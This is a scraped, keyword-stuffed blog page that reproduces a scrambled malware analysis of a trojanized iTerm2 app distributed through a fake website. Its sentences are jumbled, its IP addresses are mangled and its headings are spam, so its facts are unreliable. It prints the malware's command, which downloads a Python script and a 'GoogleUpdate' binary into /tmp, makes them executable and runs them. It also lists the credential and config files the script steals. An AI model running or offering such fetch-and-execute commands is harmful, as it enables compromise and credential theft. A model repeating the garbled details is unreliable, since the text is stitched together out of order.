zuloocape.blogg.se - Iterm2 skip word

#ITERM2 SKIP WORD ZIP FILE#
#ITERM2 SKIP WORD DOWNLOAD#

As shown in Figure 11, the URLs under 477596198 were registered around the same time as those in the second-stage server, which suggests that these two servers may have been set up by same threat actor.ITerm2 is a replacement for the default Terminal application on MacOS. Both of these IP addresses are hosted by Alibaba Hong Kong. Notably, the IP address of the second-stage server is similar to the one “GoogleUpdate” connects to, which is 477596198. Netscan scans a network for ports that are open on an IP/IP range, and IP addressess that are in use on that networkĪ83edc0eb5a2f1db62acfa60c666b5a5c53733233ce264702a16cb5220df9d4e As shown in Figure 6, all of these websites resolved to the same IP address, 43129218115.īesides the g.py script and “GoogleUpdate” components that are part of the trojanized iTerm app malware routine, the second-stage server also hosts four other Mach-O files that are used as post-penetration tools (Table 2). Searching VirusTotal for the Secure Sockets Layer (SSL) thumbprint that used revealed several other fraudulent websites. ~/Library/Application Support/iTerm2/SavedState/įurther analysis of the trojanized iTerm2 app’s Apple Distribution certificate led us to find similar trojanized apps on VirusTotal (Table 1), all of which were trojanized using the same method.~/Library/Application Support/VanDyke/SecureCRT/Config/.The Python script g.py collects the following system data and files from the victim’s machine, which the script then sends to the server:

#ITERM2 SKIP WORD DOWNLOAD#

Download “GoogleUpdate” to the folder /tmp/GoogleUpdate and execute it.

Download the g.py script to the folder /tmp/g.py and execute it.

"curl -sfo /tmp/g.py & chmod 777 /tmp/g.py & python /tmp/g.py & curl -sfo /tmp/GoogleUpdate & chmod 777 /tmp/GoogleUpdate & /tmp/GoogleUpdate".

Once executed, the malware connects to its server and receives these instructions from it: This is a clever method for repacking legitimate apps that we have not seen before.

#ITERM2 SKIP WORD ZIP FILE#

The files that are downloaded from the legitimate website come in a ZIP file format, as opposed to the DMG file from the fraudulent website, as shown in Figure 2.Īccording to Objective-see’s blog post, the malicious codes contained in the libcrypto.2.dylib file are executed automatically when the victim runs the trojanized iTerm2 app. The user is redirected to this download URL for iTerm.dmg regardless of the app version the user selects to download from the fake website the real website has different URLs and files for various versions. Instead, the website contains a link, hxxp://from which users are able to download a macOS disk image file (DMG) called iTerm.dmg. However, the malicious file is not hosted on this website directly. The trojanized appĪs of September 15, is still active. This blog entry covers the malware’s details.

This, in turn, downloads and runs other components, including the aforementioned g.py script and a Mach-O file called “GoogleUpdate” that contains a Cobalt Strike beacon payload. Objective-see previously published a blog entry about this malware, which analyzed how the threat actor repacks the iTerm2 app to load the malicious libcrypto.2.dylib.